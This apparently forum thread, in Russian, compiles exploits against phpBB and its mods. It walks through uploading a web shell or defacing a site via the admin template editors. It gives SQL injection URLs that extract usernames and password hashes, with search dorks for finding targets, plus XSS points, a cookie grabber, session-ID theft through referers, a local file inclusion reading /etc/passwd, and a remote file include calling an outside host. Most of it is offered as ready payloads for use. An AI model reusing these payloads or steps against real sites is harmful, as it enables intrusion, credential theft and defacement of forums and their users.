![]() |
Заливка шелла - eXtreme Styles
Я еще не видел такого метода заливки шелла, как использование eXtreme Styles
(*требуется доступ в админку) Версии: Точно сказать не могу, но 2.0.21-22 поддерживают Метод: eXtreme Styles -> Styles Management -> [edit templates] После этого можно при помощи встроенного(!) редактора файлов вставить необходимый код в страницу Мой любимый файл attach_rules.php Им редко кто пользуется, а после заливки туда, можно создать и свой файл Подробнее: Все просто, если есть доступ к админке и версия использует "eXtreme Styles" *я описываю так как есть в доступной мне админке Ищешь в левом столбце eXtreme Styles, под ним Styles Management, по этой ссылке кликаешь и в правом фрейме смотришь [edit templates], его кликаешь, и попадаешь в интуитивно понятный редактор файлов в forum_root папке, начинаешь естественно(так как это редактор стилей) в папке templates, выходишь на уровень выше, ищешь нужный файл (для дефейса index.php, для заливки шелла, к примеру, attach_rules.php) И кликаешь по нему, редактишь его, как надо, т.е. дописываешь в него код шелла(я советую rst-шелл, хоть большой, но качественный, правда АВниками палится) Потом давишь кнопку отправить(послать, send и тп.)и выбираешь не ФТП метод, а локалсистем, или как то так... и все, прехеходишь по неообходимой тебе ссылке, и видишь свой(или чужой шелл) ___________________________________________ помог? прибавь к репутации |
Passive XSS 2.0.22
1) Пассивная XSS: нефильтруется переменная cur_password при замене пароля
2) Opencosmo Security http://www.opencosmo.com Author: Alfredo Panzera, Opencosmo Security Vendor: phpBB.com Version: 2.0.22 Exploit: Go to http://[website]/forum/admin/admin_groups.php and into 'Group description:' insert your XSS. 3) PhpBB [profile.php] Permanent Xss Vulnerability Sep 20 2007 04:35PM Found By Seph1roth [POST METHOD] Corrupted page: profile.php?mode=editprofile&cpl_mode=profile_info Bugged Variable: "selfdes" (Campo "Altre informazioni") Xss: </textarea>[XSS STRING] |
SQL Injection
Vulnerable: [phpBB MOD] FileBase Exploit: Код:
filebase.php?d=1&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,char(58),user_password),12,13,14/**/FROM/**/phpbb_users/*Код:
inurl:"filebase.php" "Powered by phpBBVulnerable: Fully Modded phpBB (kb.php) Exploit: Код:
kb.php?mode=article&k=1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1Код:
allinurl :kb.php?mode=article&k |
phpBB 2.0.23 Session Hijacking
Session Hijacking
Vulnerable: phpBB 2.0.23 PoC: Когда модератор или администратор форума phpBB 2.0.X закрывает тему, его sessionid отправляется GET'ом: Код:
http://site.tld/phpBB2/modcp.php?t=1&mode=lock&sid=[session]Если атакующий разместил в своем посте изображение, то он может видеть referer и тем самым sessionid. И если администратор(модератор) закрывает данную тему, то атакующий получает его sessionid, которую но может использовать для дальнейших атак типа Cross Site Request Forgery ============ Elekt: В случае запрета [img] можно заюзать удаленную аватарку ;) ============ Автор: NBBN |
Заливка шела через темплейты в phpBB3(необходим доступ в админку)
Заливка шела через темплейты в phpBB3(необходим доступ в админку).
1. Разрешаем выполнение пхп в темплейтах. Устанавливаем галочку в Основные настройки(General Settings) -> Настройки безопасности(Security Settings) -> Разрешить выполнение пхп в темплейтах (Allow php in templates). 2. Далее в стилях выбираем необходимый темплейт и прописываем необходимый пхп код в следующей конструкции: Код:
<!-- PHP --> |
phpBB PJIRC mod local file inclusion
LFI
Vulnerable: phpBB PJIRC mod Vuln script: Код:
./irc.php:31 include($php_root_path. 'common.' .$phpEx);Код:
http://target.com/forum/irc/irc.php?phpEx=./../../../../../../etc/passwd |
XSS Private Messagging в Phpbb3
XSS Private Messagging On PhpBB3
http://www.victimesite.org/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=[page] Where is: Цитата:
Цитата:
COOKIES GRABBER Цитата:
|
PhpBB <= 2.0.22 CSRF Add User In Group
PhpBB <= 2.0.22 CSRF Add User In Group www.hackinginside.altervista.org Author: Vincy Email: djvincy@hotmail.it This CSRF add an user in a group. Html Exploit By Vincy: Код HTML:
<html> Flash Exploit By Nexen: PHP код:
|
phpRaider phpbb3 Bridge 'phpbb3.functions.php Remote File Include Vulnerability
phpRaider phpbb3 Bridge 'phpbb3.functions.php' Remote File Include Vulnerability http://securityfocus.com An attacker can exploit this issue via a browser. Exploit: http://www.example.com/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.example2.com/s.php |
уязвимость в сal_lite
уязвимость в сal_lite
Код:
cal_lite.php?id=12&mode=display&cl_d=%3Cscript%3Ealert(document.cookie)%3C/script%3E |
| Время: 10:31 |